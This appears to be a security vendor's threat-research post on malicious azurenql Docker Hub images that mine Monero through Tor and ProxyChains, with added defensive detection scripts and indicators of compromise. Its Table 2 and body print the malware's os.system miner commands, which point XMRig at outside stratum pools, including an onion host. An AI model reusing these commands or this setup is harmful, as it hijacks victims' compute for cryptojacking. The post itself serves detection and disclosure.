Docker containers have been gaining popularity over the past few years as an effective way of packaging software applications. Docker Hub provides a strong community-based model for users and companies to share their software applications. This is also attracting the attention of malicious actors intending to make money by cryptojacking within Docker containers and using Docker Hub to distribute these images.
We identified a malicious Docker Hub account, azurenql, active since October 2019, that was hosting six malicious images intended to mine the cryptocurrency Monero. The coin mining code within the image tries to evade network detection by using network anonymizing tools such as ProxyChains and Tor. The images hosted on this account have been collectively pulled more than two million times. For context, there are legitimate Azure-related images under the official Microsoft Docker Hub account that have anywhere from a few thousand to 100 million+ pulls. One of the wallet IDs identified has been used to earn more than 525.38 XMR, which roughly translates to $36,000 USD. Additionally, when we last checked minexmr.com for this wallet ID, we saw recent activity indicating that it’s still being used.
We would like to give a shout out to the awesome security team at Docker Hub. They were very responsive and were able to take down this malicious Docker Hub account quickly in response to our notification.
Palo Alto Networks customers are protected from this threat through Threat Prevention signatures on the Next-Generation Firewall. Prisma Cloud customers are protected from it through the Trusted Images feature.
We have identified a Docker Hub community user account named azurenql that contained eight repositories hosting six malicious Monero mining images. Here is a screenshot of the account and its repositories.
Table 1, below, provides a summary of all the images found under this Docker Hub account, listed in descending order of their pull counts. It is worth noting that the top image was pulled more than 1.47 million times.
|Image Name||Repo Digest||Image ID||Last Updated||Size
Table 1. Summary of images found on the Docker Hub account
Docker Image Structure
To understand how the image is built, we reviewed the image structure of the image azurenql/227_135:442. The image is built in the following sequence of steps:
- Use Ubuntu 16.04.6 LTS as the “base image”.
- Install dependencies required for building from source, such as gcc, make, python, etc.
- Install Tor to anonymize traffic. It is configured to listen on its default port, 9050.
- Copy the source of ProxyChains-NG and build from source. The ProxyChains config is left as default to route its traffic through the local Tor SOCKS proxy connection.
# defaults set to "tor"
socks4 127.0.0.1 9050
- Copy the source of the mining software, XMRig, and build from source.
- Copy a custom python script dao.py and set it as the image’s Entrypoint.
Figure 2, below, demonstrates this sequence.
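A defender can look for this build sequence in image metadata before anything runs. The following is an added example, not code from the original post: `triage`, the trait patterns and the sample layer strings are assumptions, and it expects the objects produced by `docker image inspect` and `docker history --no-trunc --format '{{json .}}'`.

```python
import re

# Build-step traits from the image structure described above, matched against
# the "CreatedBy" field of `docker history --no-trunc --format '{{json .}}'`.
TRAITS = {
    "tor": re.compile(r"install\b.*\btor\b", re.I),
    "proxychains": re.compile(r"proxychains", re.I),
    "xmrig": re.compile(r"xmrig", re.I),
}

def triage(inspect_doc, history):
    """Return (verdict, findings) for one image.

    inspect_doc: one object from `docker image inspect <image>`
    history:     list of per-layer objects from `docker history`
    """
    findings = set()
    for layer in history:
        step = layer.get("CreatedBy", "")
        findings.update(name for name, rx in TRAITS.items() if rx.search(step))
    # Config and Entrypoint can both be null in inspect output.
    entrypoint = (inspect_doc.get("Config") or {}).get("Entrypoint") or []
    if any(arg.endswith("dao.py") for arg in entrypoint):
        findings.add("entrypoint:dao.py")
    # A miner shipped together with a traffic anonymizer is the combination
    # this page describes; either half alone only warrants a closer look.
    has_anonymizer = bool(findings & {"tor", "proxychains"})
    if ("xmrig" in findings and has_anonymizer) or "entrypoint:dao.py" in findings:
        return "block", sorted(findings)
    return ("review" if findings else "ok"), sorted(findings)

# Constructed sample data (not captured from the real images).
SAMPLE_INSPECT = {"Config": {"Entrypoint": ["python", "/dao.py"], "Cmd": None}}
SAMPLE_HISTORY = [
    {"CreatedBy": "/bin/sh -c apt-get install -y gcc make python git"},
    {"CreatedBy": "/bin/sh -c apt-get install -y tor"},
    {"CreatedBy": "/bin/sh -c #(nop) COPY dir:0000 in /proxychains-ng"},
    {"CreatedBy": "/bin/sh -c cd /proxychains-ng && ./configure && make install"},
    {"CreatedBy": "/bin/sh -c #(nop) COPY dir:0000 in /xmrig"},
]

if __name__ == "__main__":
    print(triage(SAMPLE_INSPECT, SAMPLE_HISTORY))
    print(triage({"Config": None}, [{"CreatedBy": "/bin/sh -c apt-get install -y tor"}]))
```

An image that only installs Tor comes back as "review" rather than "block", since Tor on its own has legitimate uses.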
Custom Script dao.py Analysis
The author of these images has included a custom Python script called dao.py, which is responsible for starting the mining process within the container, and was included in all the images.
As mentioned earlier, this script is registered as the Entrypoint in the image so that as soon as the image is started, this script will run.
All the Docker images mentioned in Table 1 contain some variant of this dao.py script. The only difference between the dao.py scripts in these images is that they use a different XMRig command line invocation. The different XMRig command line invocations are listed in Table 2.
High-level execution flow of the dao.py script:
- Find the number of CPU cores on the system.
- Set hugepages system property to increase the hash rate.
- Install Tor and build dependencies.
- If proxychains-ng is not already installed, install it from https://github.com/rofl0r/proxychains-ng.git
- If XMRig binary (“dlls”) is not present in /usr/local/bin, download it from https://github.com/nguyennhatduy2608/azures/raw/master/
- Symlink the XMRig binary (“dlls”) under /usr/local/bin and /usr/bin
- Start Tor in the background.
- Launch the miner through proxychains, which in turn routes the miner traffic through the local Tor SOCKS proxy as described earlier. A list of all the different mining commands used across the different dao.py versions is included in Table 2.
The script’s execution workflow is also demonstrated in Figure 5 below.
|Image_Name||Dao.py hash||Crypto command|
|azurenql/234_122:442||3a04405e83..||os.system ('proxychains4 ' + program + ' -o stratum+tcp://188.8.131.52:442 --tls -t ' + str(cores))|
|azurenql/227_135:442||937d59ca35..||os.system ('proxychains4 ' + program + ' -o stratum+tcp://184.108.40.206:442 --tls -t ' + str(cores))|
|azurenql/227_135_tor:442||b7e07fc8ea..||os.system ('proxychains4 ' + program + ' --donate-level 1 -o stratum+tcp://5pwcq42aa42fjzel.onion:442 --tls -t ' + str(cores))|
|azurenql/227_135_app:442||de518f1690..||os.system ('proxychains4 ' + program + ' -o stratum+tcp://220.127.116.11:442 --tls -t ' + str(cores))|
|azurenql/93_164:442||81496a54fe..||os.system ('proxychains4 ' + program + ' --donate-level 1 -o stratum+tcp://18.104.22.168:442 --tls -t ' + str(cores))|
|azurenql/53_57:442||5d1cb23f8f..||os.system ('proxychains4 ' + program + ' -o stratum+tcp://22.214.171.124:442 --tls -t ' + str(cores))|
Table 2. Different mining commands used in the dao.py scripts
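Because dao.py runs the miner under the name "dlls", matching on an "xmrig" process name misses every command in Table 2; the stable signals are the stratum pool argument and the proxychains wrapper. The following is an added detection example, not code from the original post: the function names and the sample command lines are constructed, and it assumes no wrapper options precede the program name, as in Table 2.

```python
import shlex
from urllib.parse import urlsplit

WRAPPERS = {"proxychains", "proxychains4"}

def analyze_cmdline(cmdline):
    """Return a finding dict if cmdline points a miner at a stratum pool, else None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:               # unbalanced quotes in a logged command line
        argv = cmdline.split()
    pool = None
    for i, arg in enumerate(argv):
        # XMRig pool options: "-o URL", "--url URL" or "--url=URL".
        if arg in ("-o", "--url") and i + 1 < len(argv):
            pool = argv[i + 1]
        elif arg.startswith("--url="):
            pool = arg.split("=", 1)[1]
    if not pool or not pool.lower().startswith("stratum+"):
        return None
    url = urlsplit(pool)
    try:
        port = url.port
    except ValueError:               # non-numeric or out-of-range port
        port = None
    wrapped = argv[0].rsplit("/", 1)[-1] in WRAPPERS
    host = url.hostname or ""
    return {
        # The miner is whatever the wrapper launches; its file name proves nothing.
        "binary": argv[1] if wrapped and len(argv) > 1 else argv[0],
        "pool_host": host,
        "pool_port": port,
        "via_proxychains": wrapped,
        "onion_pool": host.endswith(".onion"),
    }

# Constructed command lines in the shape of Table 2 (addresses are placeholders).
SAMPLE_CMDLINES = [
    "proxychains4 /usr/local/bin/dlls -o stratum+tcp://198.51.100.7:442 --tls -t 4",
    "proxychains4 dlls --donate-level 1 -o stratum+tcp://exampleonionpool.onion:442 --tls -t 8",
    "curl -o out.bin https://example.com/file",
]

def scan(cmdlines):
    """Analyze each command line and keep only the miner findings."""
    return [f for f in map(analyze_cmdline, cmdlines) if f]
```

Feed it process command lines from audit or EDR telemetry; the `curl -o` line shows that a bare `-o` argument is not treated as a pool.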
Cryptomining is about solving a complex computational problem, which allows users to chain together blocks of transactions. These images are utilizing the processing power of the victim systems to verify transactions. Here, the image author is using two methods to mine the blocks by running these malicious images in the user's environment.
In the first method, the attacker is directly submitting the mined blocks to the central minexmr pool using a wallet ID.
os.system ('xmrig --av=7 --variant 1 --donate-level=0 -o
When we looked up the transaction summary on the Monero mining pool, minexmr.com for this wallet ID, we saw recent activity indicating that the wallet ID is still used.
Figure 6 below shows the mining activity for this wallet in April and May 2020.
Figure 7 below indicates that this wallet ID has already earned 525.38 XMR, which roughly translates to $36,000 USD.
In the second method, the author has instances deployed on a hosting service running their own mining pool, which are used to collect mined blocks.
The “Crypto Command” column in Table 2 lists examples of this method.
os.system ('proxychains4 ' + program + ' --donate-level 1 -o stratum+tcp://126.96.36.199:442 --tls -t ' + str(cores))
Docker containers provide a convenient way of packaging software, as is evident from their increasing adoption rate. Combined with coin mining, this makes it easy for a malicious actor to distribute their images to any machine that supports Docker and instantly start using its compute resources for cryptojacking.
Palo Alto Networks Next-Generation Firewall customers subscribed to Threat Prevention are protected from this threat. Palo Alto Networks has released a Threat Signature to prevent network-based delivery of the malicious images identified in this blog. Details of this signature are:
|85887||Coin Mining Docker image Detection|
Table 3. Signature description for NGFW coverage
In addition, we recommend security best practices such as:
- Avoid pulling or using base images from untrusted repositories.
- Install the latest apps and threat definitions on the Palo Alto Networks Next-Generation Firewall.
- Palo Alto Networks Prisma Cloud can be used to secure cloud deployments.
Indicators of Compromise
|Image Name||Repo Digest||Image ID|
Wallet ID 43ZBkWEBNvSYQDsEMMCktSFHrQZTDwwyZfPp43FQknuy4UD3qhozWMtM4kKRyrr2Nk66JEiTypfvPbkFd5fGXbA1LxwhFZf
dao.py script hashes
Docker Hub account